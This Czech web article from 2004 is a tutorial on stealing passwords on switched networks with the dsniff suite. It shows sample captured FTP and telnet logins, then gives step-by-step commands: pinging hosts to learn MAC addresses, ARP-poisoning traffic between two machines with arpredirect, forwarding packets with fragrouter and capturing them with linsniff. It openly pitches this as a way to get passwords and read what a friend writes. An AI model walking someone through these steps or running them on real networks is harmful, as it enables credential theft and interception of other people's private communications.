Zpět na seznam článků     Číst komentáře (0)     Verze pro tisk

Hesla na stříbrném tácu (arpredirect)

Autor: .cCuMiNn.   
9.7.2004

Ještě něco o sniffu. Tentokrát jak na to v přepínaných sítích - Arpredirect


Docetl jsi se o dsniff? Chystas se instalovat linux aby jsi mohl dsniff pouzit a zjistit hesla a treba i to o cem si pise tvuj kamos?

Kazdy kdo pouzije dsniff bude moci ve sdilenem nebo ethernetovem segmentu odposlouchavat sitovy provoz. Program muzes ziskat na http://naughty.monkey.org/~dugsong/dsniff nebo dotazem ve vyhledavaci. Existuje i verze pro Win na adrese http://www.eeye.com ktera ale nema tolik funkci a neni tak robustni jako linuxova verze. Pro win potrebujete jeste libpcap z http://netgroup-serv.polito.it/winpcap/install/default.html
Nasleduje vypis programu
[root@me] dsniff
-------------------------------------------------------
01/01/02 10:49:10 bob -> unix-server (ftp)
USER bob
PASS mujsystem


----------------------------------------------------
01/01/02 10:59:10 karen -> lax-cisco (telnet)
karen
adminijsm

Balik obsahuje krome dsniffu nekolik dalsich utilit ktere stoji za to vyzkouset. napr mailsnarf nebo webspy

V soucasne dobe filtrovanych sitich je nejnebezpecnejsi utilitou arpredirect Proti druhu odposlouchavani hesel za pomoci arpredirect a fragrouter neexistuje obrana krome jedine a to je sifrovani provozu. Ale protokoly POP3 a telnet sifrovane nejsou....
Jak vlastne pouzit ten arpredirect?
[twist] ping crush
PING 10.1.1.1 from 10.1.1.19: 56(84) bytes of data
64 bytes from 10.1.1.1: icmp_seq=0 ttl=128 time=1.3

[twister] ping shadow

PING 10.1.1.18 from 10.1.1.19 : 56(84) bytes of data
64 bytes from 10.1.1.18: icmp_seq=0 ttl=255 time=5.2ms

To umozni twisteru zapamatovat si odpovidajici MAC adresy ktere potrebuje k presmerovani(zjisti MAc z IP)


[twister] arpredirect -t 10.1.1.18 10.1.1.1
intercepting traffic from 10.1.1.18 to 10.1.1.1 (^C to exit)


Tento prikaz spusti arp redirect a presmeruje veskery tok dat ze systemu shadow urceny pro crush na twister. Twister musi preposlat packety na crush takze musi mit zapnute preposilani packetu . K tomu pouzijeme fragerouter(vsechny utility jsou z dsniff) (http://www.anzen.com/research/nidsbench/fragerouter.html)

fragerouter -B1

nakonec staci spustit analyzator packetu..
linsniff
a muzeme cekat na nejake zajimave informace.




Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)